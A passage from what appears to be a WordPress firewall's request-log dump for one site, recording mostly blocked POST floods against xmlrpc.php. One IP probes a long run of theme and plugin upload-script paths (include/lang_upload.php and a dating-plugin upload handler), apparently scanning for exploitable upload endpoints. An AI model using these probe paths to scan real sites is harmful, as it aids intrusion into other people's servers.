Safari\\/537.36\"}','Sm4Po1QtJg7GMO2b3z9uNxaU',0,1680826437.4109,3077,'','POST',403,0,515,0,1,'',0),('162.0.217.70',2717964614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','v0aIBJ4u1AmkrVKRgNh6xMbE',0,1680826436.6452,4742,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','w4oIc7tfLaOK3gEZyYBdUh15',0,1680826441.6010,618,'','POST',403,0,515,0,1,'',0),('185.185.89.10',3115931914,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','TKkMmIEgYczCbW4sA76wSuN8',0,1680826447.8351,691,'','POST',403,0,515,0,1,'',0),('185.231.59.72',3118938952,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','tHQgE2FVTdaqx8SkNB6c1lhP',0,1680826456.0379,1561,'','POST',403,0,515,0,1,'',0),('68.183.225.173',1152901549,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','h3lGu4CAFUQcSIarxoBJyDPV',0,1680826464.2517,604,'','POST',403,0,515,0,1,'',0),('148.66.147.20',2487390996,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','bI1eCRhZq9MPGtdwjnl0YcHu',0,1680826465.0083,611,'','POST',403,0,515,0,1,'',0),('143.198.157.238',2412158446,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','TqMsNUIRdlyKwk9u5fcC0o2j',0,1680826472.9045,1178,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','HyJK4C2TrpnPsdcE8gDuaNlA',0,1680826473.2529,1096,'','POST',403,0,515,0,1,'',0),('109.248.148.195',1845007555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gVqj4Gnwt70phAEx6sc3DBvd',0,1680827786.6667,3457,'','POST',403,0,515,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/statfort-new/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','DV0uCZwLX4Jl1AoYtxP58Qa2',0,1680830880.3511,341,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/faith-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Mobile Safari\\/537.36\"}','VJUPS7jZQHsDyfhL8IeBvw6k',0,1680830882.1049,413,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/soccer-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Mobile Safari\\/537.36\"}','kMgD63pNy4jaEiT5GuPA0dvc',0,1680830884.9668,342,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/churchlife/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/111.0.5563.72 Mobile\\/15E148 Safari\\/604.1\"}','hiDbtJMqnAWrFRulaNG5oU9K',0,1680830886.5078,341,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/onelife/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','1SgQ0XnKCdIy6wvxGup7mF2U',0,1680830891.7042,370,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/snapture/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','sXyD2LNuMT781YxqwaS34UQt',0,1680830896.2144,360,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/theme-deejay/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','hnjfa1SquIAYQO05l83LHdRp',0,1680830899.3395,295,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/bolster-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/111.0.5563.72 Mobile\\/15E148 Safari\\/604.1\"}','duXAtwOJayBU1mrWDNC0RsFi',0,1680830901.5186,362,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/rocky-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','BY2GOfgzbmpld6DT5iwPevFE',0,1680830903.2497,283,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/bolster/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','x8EjYHcayP9WURe072SvJNto',0,1680830904.6163,311,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/soundblast/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.5563.57 Mobile Safari\\/537.36\"}','JKait7xLuSoBzhw8enCG4AdE',0,1680830906.0449,294,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/spikes-black/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.5563.57 Mobile Safari\\/537.36\"}','OA59HXWprEslbnvVuJD0G4eS',0,1680830907.5069,286,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/spikes/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','bj5ytKDE7zIN2fhSplm8RCT3',0,1680830908.9299,295,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/kingclub-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','B5kUxYGIp8SD39VnC0rsdyFw',0,1680830910.3386,320,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/club-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','0J4RWsq9g7tG6LdDSKceHOyw',0,1680830911.8290,407,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/statfort/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','XpH3klRoe1sQGDVB2vFg7PIY',0,1680830913.3386,341,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/aidreform/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/111.0.5563.72 Mobile\\/15E148 Safari\\/604.1\"}','3azwyx5p2tMjnuTZS8cDRYe7',0,1680830914.8367,296,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/footysquare/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/111.0.5563.72 Mobile\\/15E148 Safari\\/604.1\"}','V9XNyrAvcWms0iD7xGJPM1kZ',0,1680830917.9678,367,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/themes/westand/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/111.0.5563.72 Mobile\\/15E148 Safari\\/604.1\"}','srgKPcGU9vT0h8fy7xz1tp2J',0,1680830919.5087,330,'','GET',403,0,700,0,1,'',0),('128.140.14.203',2156662475,'','http://cmdev-site1.com/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','zepHa4WJTOfEc0tlbg5smSn7',0,1680830921.6412,309,'','GET',403,0,700,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','mhwaVHi1sjNXYlqWf8EcbAv4',0,1680831740.9346,4332,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','4a6imOr3ENo7xpQJfdqlKbk8',0,1680831747.8694,813,'','POST',403,0,515,0,1,'',0),('182.92.129.110',3059515758,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','bcZBEaLvMGNo0UP8K1y674OR',0,1680831748.4794,869,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','hTON5Ip1lZHGEfwkM8PSK7vC',0,1680831752.8376,604,'','POST',403,0,515,0,1,'',0),('210.116.66.47',3530834479,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','ZyGepJB9Y7RuzarqSAtFhin4',0,1680831758.0731,667,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','7kMjl0c3dxFNbiSuBJYVImUr',0,1680831766.4583,1384,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','eCfuGtqwWn43PTOhdDHEIbco',0,1680831766.5693,1333,'','POST',403,0,515,0,1,'',0),('86.48.23.13',1445992205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','izHnCy4Kc21XAlMfwPkWhTYU',0,1680831770.4351,640,'','POST',403,0,515,0,1,'',0),('185.232.250.86',3119053398,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','VfsqLlkICWvD35zUi0p9E2Rr',0,1680831775.1596,593,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','3AizSroqNl8wmRPaEckujKsB',0,1680831782.1123,633,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','eVjin5AJHpRq8Qvfdw1zUTo4',0,1680831783.2504,683,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','3aS72dEjTVu4rebDlcOKsPnq',0,1680834906.3581,2502,'','POST',403,0,515,0,1,'',0),('184.168.98.254',3098043134,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','NMx4FpIOrcetSsEJ0yq27ZoY',0,1680834904.9610,4790,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','9n3LIytv6awfD8P5c7psQrTZ',0,1680834905.8491,3902,'','POST',403,0,515,0,1,'',0),('198.23.62.79',3323412047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','3GU15eQxouYAKk8PEh7n0zrX',0,1680834914.2299,612,'','POST',403,0,515,0,1,'',0),('210.116.66.47',3530834479,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','VPnD7O83fLiUdSzj2Qmc0CX5',0,1680834916.9005,604,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','j53zxZOgVtwPAXNm7sFE4J8L',0,1680834928.5428,426,'','POST',404,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','uBjhtTE5rd3cQwsSm6Pi89XW',0,1680834930.0533,1087,'','POST',403,0,515,0,1,'',0),('104.37.86.31',1747277343,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','PCw32x0K1tbVU6eznWavI5kO',0,1680834930.8437,756,'','POST',403,0,515,0,1,'',0),('45.77.11.71',760023879,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','TPRLsjQ9hHv0MCDK5BfcibIr',0,1680834938.1251,649,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','NY0C9qmHZ1VfM8cXwLuKJIT2',0,1680834938.9191,672,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','puxCvwzhgUMRfnqGW4Xy5YA3',0,1680834944.5438,600,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','6F5OuYTGHlZUIJtwezKpcod0',0,1680834947.8800,716,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','qiKF3txZndcoy6GkmRBhuIPA',0,1680834952.0893,630,'','POST',403,0,515,0,1,'',0),('64.42.179.43',1076540203,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','sM1lOdCK8EySx2cjfTrXVRto',0,1680835264.0238,3494,'','POST',403,0,515,0,1,'',0),('185.88.177.243',3109597683,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','EpYdDimGMlBnwXe8Wk52U0xj',0,1680836431.3832,4382,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','XaAR29miTZfu8UYclJF0zPBe',0,1680836434.2762,2299,'','POST',403,0,515,0,1,'',0),('200.58.110.37',3359272485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','DW7x4Q2PGJc8sdVUrv3wbO0L',0,1680836434.9598,2126,'','POST',403,0,515,0,1,'',0),('213.152.186.35',3583556131,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','jDbEKvF0RkJLWld8qs9ZSo3I',0,1680836504.3140,2624,'','POST',403,0,515,0,1,'',0),('107.167.244.67',1806169155,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','YRXLGl3qocHt7VMauke0CKFy',0,1680837065.4679,3800,'','POST',403,0,515,0,1,'',0),('68.178.145.187',1152553403,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','ZmsqGoiXb4fD19YvaOw8l7jn',0,1680837502.5972,4012,'','POST',403,0,515,0,1,'',0),('185.182.57.22',3115727126,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','8wuAptO71eDVZ3xHi2NK5acF',0,1680837509.8944,692,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','rshy3aZ6MQFuS90pb5GtDo2P',0,1680837517.8279,611,'','POST',403,0,515,0,1,'',0),('46.101.182.98',778417762,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','nCjTe7P4aGNXvZRWmoiAQtb1',0,1680837531.0953,589,'','POST',403,0,515,0,1,'',0),('209.236.124.38',3521936422,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','J54jHnDLwrisagqoCYtlWvx7',0,1680837534.5901,1753,'','POST',403,0,515,0,1,'',0),('207.154.253.117',3483041141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','R4620oJIYnLsB9b1ZkwWQd38',0,1680837547.2161,563,'','POST',403,0,515,0,1,'',0),('43.143.239.49',730853169,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','9BD4vpMQZwygRNqhOVuSGeIi',0,1680839755.5072,1917,'','POST',403,0,515,0,1,'',0),('194.59.206.66',3258699330,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','nXFR67M3EeuaY01oTjOdgH8h',0,1680839753.3072,4924,'','POST',403,0,515,0,1,'',0),('5.161.122.207',94468815,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','P7fIUS9ka8Q6e4doAulB03Zt',0,1680839762.4829,1102,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','ws3NoqPLc4hEZ52yU1dAv6JB',0,1680839762.9671,1030,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','qy40Tj2Iusl7trUJiHSAKz6E',0,1680839770.2816,960,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','5nJpW2co1MxSz8hNuAy0dgQr',0,1680839770.8589,956,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','lEfwJGm1RXLyQZUS6apxPqir',0,1680839776.2162,841,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','vkJegtYXVGMnzWsbHUBL1wR8',0,1680839776.8724,788,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','iaLqTAlpGhRkrjWwevStQJUn',0,1680839780.2955,575,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','zhtQsIT4NaqoicnKlwAJ5OBf',0,1680839786.7932,622,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','50GqfexX2NhyTtOMI6J4r9mj',0,1680839792.1728,586,'','POST',403,0,515,0,1,'',0),('82.102.27.195',1382423491,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Ox5ZYuGmMvdF3k0bhUD1zygc',0,1680842264.7557,9383,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','3SKPLUj0p5ANHqvm4RsX1JTZ',0,1680842774.5717,2187,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 